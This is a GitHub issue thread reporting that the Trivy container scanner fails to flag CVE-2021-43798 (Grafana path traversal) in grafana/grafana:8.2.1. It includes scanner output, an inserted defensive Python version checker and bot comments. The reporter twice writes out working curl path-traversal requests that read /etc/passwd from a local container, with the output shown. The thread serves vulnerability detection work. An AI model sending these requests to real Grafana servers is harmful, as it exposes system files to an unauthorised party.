
Trivy not detecting CVE-2021-43798: Grafana directory traversal ? #1459

Closed
stefanlasiewski opened this issue Dec 12, 2021 · 9 comments
Labels
kind/bug Categorizes issue or PR as related to a bug. lifecycle/stale Denotes an issue or PR has remained open with no activity and will be auto-closed.

Comments

@stefanlasiewski

stefanlasiewski commented Dec 12, 2021

Description

Grafana issued a notice about CVE-2021-43798: Grafana directory traversal this week. It affects all Grafana 8.x instances.

https://grafana.com/blog/2021/12/08/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/

However, Trivy doesn't seem to be picking it up. Why is this?

What did you expect to happen?

I expect this command to list CVE-2021-43798:

trivy --debug image --severity HIGH,CRITICAL grafana/grafana:8.2.1 |grep CVE-2021-43798

What happened instead?

It doesn't list this CVE:

$ trivy --debug image --severity HIGH,CRITICAL grafana/grafana:8.2.1 |grep CVE-2021-43798
$ 

Output of run with -debug:

2021-12-12T13:22:19.529-0800	DEBUG	Severities: HIGH,CRITICAL
2021-12-12T13:22:19.573-0800	DEBUG	cache dir:  /Users/USER/Library/Caches/trivy
2021-12-12T13:22:19.574-0800	DEBUG	DB update was skipped because DB is the latest
2021-12-12T13:22:19.574-0800	DEBUG	DB Schema: 1, Type: 1, UpdatedAt: 2021-12-12 18:40:08.31377395 +0000 UTC, NextUpdate: 2021-12-13 00:40:08.31377365 +0000 UTC, DownloadedAt: 2021-12-12 21:17:12.759986 +0000 UTC
2021-12-12T13:22:19.574-0800	DEBUG	Vulnerability type:  [os library]
2021-12-12T13:22:19.581-0800	DEBUG	Image ID: sha256:092a480a2531b3479d9c8591169723f2b49c79e8ec4b76b9f8aad3faaeb405ec
2021-12-12T13:22:19.581-0800	DEBUG	Diff IDs: [sha256:e2eb06d8af8218cfec8210147357a68b7e13f7c485b991c288c2d01dc228bb68 sha256:f865a4a4507d0e4e597a98697aacb4f32fe33e40bfe87c751ce7d4b4ccb0f6ff sha256:6b5061d1e966a1981e77ac13b2b3f3db7d0432e46c1f580442b7b0f6bbb66adf sha256:259ecfabcacfdfc827c042f41875cccc3eda532b2bbc40a0d2318302a1dbc1de sha256:bf9d934f4f2adbf028c4e223e087ae2efbb79165e20ab7f706b67207efb4e0bb sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef sha256:c83dbe321467a37a213390da75e76aedc0a850cba33409fbddc178b4ff659ce6 sha256:46abefb2a8e81cc2a20eae36faa15582f2b209d9d29a6902a1df227b69cb9f49]
2021-12-12T13:22:19.584-0800	INFO	Detected OS: alpine
2021-12-12T13:22:19.584-0800	INFO	Detecting Alpine vulnerabilities...
2021-12-12T13:22:19.584-0800	DEBUG	alpine: os version: 3.14
2021-12-12T13:22:19.584-0800	DEBUG	alpine: the number of packages: 34
2021-12-12T13:22:19.585-0800	INFO	Number of language-specific files: 2
2021-12-12T13:22:19.585-0800	INFO	Detecting gobinary vulnerabilities...
2021-12-12T13:22:19.585-0800	DEBUG	Detecting library vulnerabilities, type: gobinary, path: usr/share/grafana/bin/grafana-cli
2021-12-12T13:22:19.585-0800	DEBUG	Detecting library vulnerabilities, type: gobinary, path: usr/share/grafana/bin/grafana-server

grafana/grafana:8.2.1 (alpine 3.14.2)
=====================================
Total: 18 (HIGH: 18, CRITICAL: 0)

+------------+------------------+----------+-------------------+---------------+---------------------------------------+
|  LIBRARY   | VULNERABILITY ID | SEVERITY | INSTALLED VERSION | FIXED VERSION |                 TITLE                 |
+------------+------------------+----------+-------------------+---------------+---------------------------------------+
| busybox    | CVE-2021-42378   | HIGH     | 1.33.1-r3         | 1.33.1-r6     | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42378 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42379   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42379 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42380   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42380 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42381   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42381 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42382   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42382 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42383   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42383 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42384   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42384 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42385   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42385 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42386   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42386 |
+------------+------------------+          +                   +               +---------------------------------------+
| ssl_client | CVE-2021-42378   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42378 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42379   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42379 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42380   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42380 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42381   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42381 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42382   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42382 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42383   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42383 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42384   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42384 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42385   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42385 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42386   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42386 |
+------------+------------------+----------+-------------------+---------------+---------------------------------------+

usr/share/grafana/bin/grafana-cli (gobinary)
============================================
Total: 0 (HIGH: 0, CRITICAL: 0)


usr/share/grafana/bin/grafana-server (gobinary)
===============================================
Total: 0 (HIGH: 0, CRITICAL: 0)

Output of trivy -v:

$ trivy -v
Version: 0.21.2
Vulnerability DB:
  Type: Full
  Version: 1
  UpdatedAt: 2021-12-12 18:40:08.31377395 +0000 UTC
  NextUpdate: 2021-12-13 00:40:08.31377365 +0000 UTC
  DownloadedAt: 2021-12-12 21:17:12.759986 +0000 UTC

Additional details (base image name, container registry info...):

n/a

@stefanlasiewski stefanlasiewski added the kind/bug Categorizes issue or PR as related to a bug. label Dec 12, 2021
@stefanlasiewski
Author

I can confirm that this container version is vulnerable:

$ docker run --rm -d --name=grafana -p 3000:3000 grafana/grafana:8.2.1
94635778b7021e165ae5d1c88a6b5203ad10a527a6071ec4d64a2426b2550b3f
$ docker ps
CONTAINER ID   IMAGE                   COMMAND     CREATED         STATUS         PORTS                    NAMES
94635778b702   grafana/grafana:8.2.1   "/run.sh"   7 seconds ago   Up 6 seconds   0.0.0.0:3000->3000/tcp   grafana

$ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../VERSION
8.2.1
$ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin

@jerbia
Contributor

jerbia commented Dec 12, 2021

@knqyf263 I suspect Grafana is not installed through a package manager, but it's deployed as a binary, which currently Trivy does not support?

@afdesk
Contributor

afdesk commented Dec 13, 2021

@stefanlasiewski thanks for your report!
let me investigate it.

@afdesk
Contributor

afdesk commented Dec 13, 2021

@jerbia you're right, Grafana is deployed as a binary, and Trivy doesn't detect it.

@stefanlasiewski
Author

stefanlasiewski commented Dec 13, 2021

@afdesk Interesting. Is there a way for Trivy to detect this? Does Trivy look at the md5 sums of installed binaries, for example?

For the record, docker scan (which uses Snyk) doesn't find the vulnerability either:

$ docker scan --severity medium grafana/grafana:8.2.1

Testing grafana/grafana:8.2.1...

Organization:      stefanlasiewski
Package manager:   apk
Project name:      docker-image|grafana/grafana
Docker image:      grafana/grafana:8.2.1
Platform:          linux/amd64
Base image:        grafana/grafana:8.2.1
Licenses:          enabled

✓ Tested 34 dependencies for known issues, no vulnerable paths found.

Base Image             Vulnerabilities  Severity
grafana/grafana:8.2.1  11               0 critical, 0 high, 0 medium, 11 low

Recommendations for base image upgrade:

Minor upgrades
Base Image             Vulnerabilities  Severity
grafana/grafana:8.3.2  0                0 critical, 0 high, 0 medium, 0 low

And neither does Anchore's SBOM method with syft/grype (FTR: Grype's issue is at anchore/grype#534):

$ grype -q grafana/grafana:8.2.1
NAME                              INSTALLED                             FIXED-IN   VULNERABILITY        SEVERITY 
busybox                           1.33.1-r3                             1.33.1-r4  CVE-2021-42374       Medium    
busybox                           1.33.1-r3                             1.33.1-r5  CVE-2021-42375       Medium    
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42378       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42379       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42380       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42381       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42382       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42383       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42384       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42385       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42386       High      
github.com/cortexproject/cortex   v1.8.2-0.20210428155238-d382e1d80eaf             GHSA-jphm-g89m-v42p  Medium    
github.com/google/flatbuffers     v1.12.0                                          CVE-2020-35864       High      
github.com/grafana/loki           v1.6.2-0.20210520072447-15d417efe103             GHSA-grj5-8x6q-hc9q  Medium    
github.com/grafana/loki           v1.6.2-0.20210520072447-15d417efe103             CVE-2021-36156       Medium    
github.com/prometheus/prometheus  v1.8.2-0.20210621150501-ff58416a0b02             CVE-2019-3826        Medium    
google.golang.org/protobuf        v1.27.1                                          CVE-2015-5237        High      
ssl_client                        1.33.1-r3                             1.33.1-r4  CVE-2021-42374       Medium    
ssl_client                        1.33.1-r3                             1.33.1-r5  CVE-2021-42375       Medium    
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42378       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42379       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42380       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42381       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42382       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42383       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42384       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42385       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42386       High      

@afdesk
Contributor

afdesk commented Dec 13, 2021

@stefanlasiewski In this case, Trivy detected and checked two binary files, grafana-cli and grafana-server (which contain three medium vulnerabilities),
but the app is a scope of files... I need to think it over.

Maybe I missed something.

Thanks for your investigation!
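The comments above (jerbia's and afdesk's point that Grafana is a bare binary rather than an apk package, and the docker scan / grype results showing the same blind spot) describe a gap every scanner in the thread shares: the Go modules compiled into grafana-server are matched, but the Grafana release itself is not an installed package, so CVE-2021-43798 is never looked up. The following script is an added example, not Trivy's code and not anything from the Grafana project. It covers the gap for one application by reading the VERSION file that the image ships (the curl output in this issue reads it as 8.2.1) from an extracted image filesystem and comparing it against operator-supplied affected ranges. The path usr/share/grafana/VERSION is assumed from the usr/share/grafana prefix in the Trivy log, and the single range [8.0.0, 9.0.0) is a coarse placeholder built from the issue's "all Grafana 8.x" statement; the per-branch fixed versions must be taken from the Grafana advisory linked at the top of the issue.

```python
"""Version-range check for an application shipped as a bare binary.

Added example (not Trivy's own code). The scanners in this issue match the
Go modules compiled into grafana-server but have no package record for
Grafana itself, so an application-level CVE is never looked up. Until the
scanner learns about the application, a scan of the extracted image
filesystem can compare the shipped VERSION file against the advisory's
affected ranges and fail the build when it matches.
"""
import re
import sys
from pathlib import Path
from typing import List, Tuple

# Constructed placeholder: the issue only says "all Grafana 8.x", so this is
# one coarse half-open range [first affected, first fixed). Replace it with
# the per-branch fixed versions from the Grafana advisory linked in the issue.
AFFECTED_RANGES: List[Tuple[str, str]] = [("8.0.0", "9.0.0")]

# Assumed location of the version file inside the extracted image filesystem
# (the Trivy log shows the binaries under usr/share/grafana/bin).
VERSION_FILE = "usr/share/grafana/VERSION"

_VERSION_RE = re.compile(r"^v?(\d+(?:\.\d+)*)(?:-([0-9A-Za-z.]+))?$")


def parse_version(text: str) -> Tuple[Tuple[int, ...], int, str]:
    """Turn '8.3.0-beta1' into a sortable key.

    Pre-releases sort before the release they precede: the middle element is
    0 for a pre-release and 1 for a final release. A leading 'v' and trailing
    whitespace (as found in a VERSION file) are tolerated.
    """
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    numbers = tuple(int(n) for n in m.group(1).split("."))
    # Pad to three components so 8.3 and 8.3.0 compare equal.
    numbers = numbers + (0,) * (3 - len(numbers))
    pre = m.group(2) or ""
    return (numbers, 0 if pre else 1, pre)


def is_affected(version: str, ranges: List[Tuple[str, str]] = AFFECTED_RANGES) -> bool:
    """True when version falls inside any [first_affected, first_fixed) range."""
    key = parse_version(version)
    return any(parse_version(lo) <= key < parse_version(hi) for lo, hi in ranges)


def check_image_root(root: str, ranges: List[Tuple[str, str]] = AFFECTED_RANGES) -> dict:
    """Inspect an extracted image filesystem rooted at `root`.

    Returns a small report so a CI gate can act on it: whether the version
    file was found, the version string, and whether it is in an affected range.
    """
    path = Path(root) / VERSION_FILE
    if not path.is_file():
        return {"found": False, "version": None, "affected": False}
    version = path.read_text(encoding="utf-8").strip()
    return {"found": True, "version": version, "affected": is_affected(version, ranges)}


if __name__ == "__main__":
    # Usage: python check_app_version.py /path/to/extracted/rootfs
    # (for example the directory produced by `docker export` and `tar -x`).
    report = check_image_root(sys.argv[1] if len(sys.argv) > 1 else ".")
    print(report)
    sys.exit(1 if report["affected"] else 0)
```

The check is deliberately file-based rather than binary-based: the Go build info embedded in grafana-server records dependency versions, but the main module of a binary built outside a module cache usually carries no usable version, which is exactly why the gobinary analyzer in the log above reports zero findings for the application itself.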

@github-actions

This issue is stale because it has been labeled with inactivity.

@github-actions github-actions bot added the lifecycle/stale Denotes an issue or PR has remained open with no activity and will be auto-closed. label Feb 13, 2022
@stefanlasiewski
Author

Hi @afdesk, do you happen to have any fixes in mind for this? It's still happening on Trivy 0.23.

stefanl@stefanl:~ $ docker run --rm -d --name=grafana -p 3000:3000 grafana/grafana:8.2.1

stefanl@stefanl:~ $ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../VERSION
8.2.1
stefanl@stefanl:~ $ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/ash
stefanl@stefanl:~ $ trivy --version
Version: 0.23.0

@github-actions github-actions bot removed the lifecycle/stale Denotes an issue or PR has remained open with no activity and will be auto-closed. label Feb 18, 2022
@github-actions

This issue is stale because it has been labeled with inactivity.

@github-actions github-actions bot added the lifecycle/stale Denotes an issue or PR has remained open with no activity and will be auto-closed. label Apr 19, 2022
Development

No branches or pull requests

3 participants